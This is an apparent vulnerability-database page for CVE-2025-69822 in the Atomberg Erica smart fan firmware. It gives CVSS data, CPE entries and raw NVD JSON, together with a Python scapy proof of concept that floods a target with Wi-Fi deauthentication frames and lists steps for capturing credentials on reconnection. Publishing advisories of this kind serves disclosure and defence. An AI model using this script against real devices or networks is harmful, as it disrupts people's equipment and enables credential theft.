Security Vulnerability Report
中文
CVE-2025-69822 CVSS 7.4 HIGH

CVE-2025-69822

Published: 2026-01-22 16:16:08
Last Modified: 2026-02-02 20:11:39
Source: [email protected]

Description

An issue in Atomberg Atomberg Erica Smart Fan Firmware Version: V1.0.36 allows an attacker to obtain sensitive information and escalate privileges via a crafted deauth frame

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:atomberg:erica_smart_fan_firmware:1.0.36:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:atomberg:erica_smart_fan:-:*:*:*:*:*:*:* - NOT VULNERABLE
Atomberg Erica Smart Fan Firmware V1.0.36及之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-69822 PoC - Atomberg Erica Smart Fan Deauth Attack Note: This code is for educational and security research purposes only. Unauthorized use against systems you don't own or have permission to test is illegal. """ from scapy.all import RadioTap, Dot11, Dot11Deauth, sendp import sys import time def create_deauth_packet(target_mac, ap_mac, reason_code=7): """ Create a deauthentication frame target_mac: MAC address of the target device ap_mac: MAC address of the access point reason_code: 7 = Class 3 frame received from non-associated station """ # 802.11 RadioTap header radio = RadioTap() # 802.11 Deauth frame # Type: Management (2), Subtype: Deauth (12 = 0x0C) dot11 = Dot11( type=2, # Management frame subtype=12, # Deauth addr1=target_mac, # Destination (target device) addr2=ap_mac, # Source (AP) addr3=ap_mac # BSSID ) # Deauth reason code deauth = Dot11Deauth(reason=reason_code) # Construct the complete packet packet = radio / dot11 / deauth return packet def send_deauth_attack(target_mac, ap_mac, count=100, interval=0.1): """ Send deauthentication frames to disconnect target device """ print(f"[*] Starting deauth attack on {target_mac}") print(f"[*] Target AP: {ap_mac}") print(f"[*] Sending {count} deauth frames...") packet = create_deauth_packet(target_mac, ap_mac) try: sendp(packet, count=count, inter=interval, verbose=1) print("[+] Deauth attack completed") print("[!] Target device should be disconnected from the network") except Exception as e: print(f"[-] Error: {e}") print("[!] Make sure you're running as root and have scapy installed") def capture_reauth_info(interface): """ Monitor for reauthentication frames to capture sensitive info This would require monitor mode on the wireless interface """ print(f"[*] Setting interface {interface} to monitor mode...") print("[*] Waiting for target device reconnection...") print("[*] Capturing authentication handshake...") # Note: Full implementation would use scapy sniff() function # to capture and analyze reauth frames for credential extraction if __name__ == "__main__": print("=" * 60) print("CVE-2025-69822 PoC - Atomberg Erica Smart Fan Vulnerability") print("=" * 60) # Example configuration (replace with actual target values) TARGET_MAC = "AA:BB:CC:DD:EE:FF" # Smart fan MAC address AP_MAC = "00:11:22:33:44:55" # Access point MAC # Send deauth packets send_deauth_attack(TARGET_MAC, AP_MAC, count=100) print("\n[*] Next steps for exploitation:") print("1. Monitor for device reconnection attempts") print("2. Capture authentication frames during reconnection") print("3. Extract sensitive information from captured frames") print("4. Use extracted credentials for privilege escalation") print("\n[!] Disclaimer: Use only on systems you have permission to test")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69822", "sourceIdentifier": "[email protected]", "published": "2026-01-22T16:16:08.033", "lastModified": "2026-02-02T20:11:38.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Atomberg Atomberg Erica Smart Fan Firmware Version: V1.0.36 allows an attacker to obtain sensitive information and escalate privileges via a crafted deauth frame"}, {"lang": "es", "value": "Un problema en Atomberg Atomberg Erica Smart Fan Versión de firmware: V1.0.36 permite a un atacante obtener información sensible y escalar privilegios a través de un marco de desautenticación manipulado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-294"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:atomberg:erica_smart_fan_firmware:1.0.36:*:*:*:*:*:*:*", "matchCriteriaId": "36E416B4-8771-46AF-9F04-8D55FFED5E97"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:atomberg:erica_smart_fan:-:*:*:*:*:*:*:*", "matchCriteriaId": "AC482434-11E2-44C9-BB91-E3F025EB7928"}]}]}], "references": [{"url": "https://github.com/CipherX1802/CVE-2025-69822-Atomberg_Erica_SmatFan_Security_Assessment.git", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/CipherX1802/CVE-2025-69822-Atomberg_Erica_SmatFan_Security_Assessment/blob/main/Atomberg_Erica_SmatFan_Security_Assessment_Report.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.